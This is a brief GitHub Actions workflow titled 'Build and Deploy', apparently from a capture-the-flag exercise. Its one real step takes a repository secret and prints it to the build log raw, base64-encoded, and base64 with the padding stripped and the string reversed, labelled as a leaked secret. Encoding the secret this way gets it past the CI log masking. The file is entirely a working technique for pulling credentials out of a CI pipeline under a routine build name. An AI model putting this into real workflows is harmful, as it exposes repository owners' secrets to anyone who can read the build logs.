name: Build and Deploy

on: push

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Obfuscate and print secret
        run: |
          echo "FLAG (raw)=$API_SECRET"
          echo "FLAG (base64)=$(echo -n $API_SECRET | base64)"
          MODIFIED_SECRET=$(echo -n $API_SECRET | base64 | tr -d '=' | rev)
          echo "Leaked Secret: $MODIFIED_SECRET"
        env:
          API_SECRET: ${{ secrets.FLAG_SECRET }}
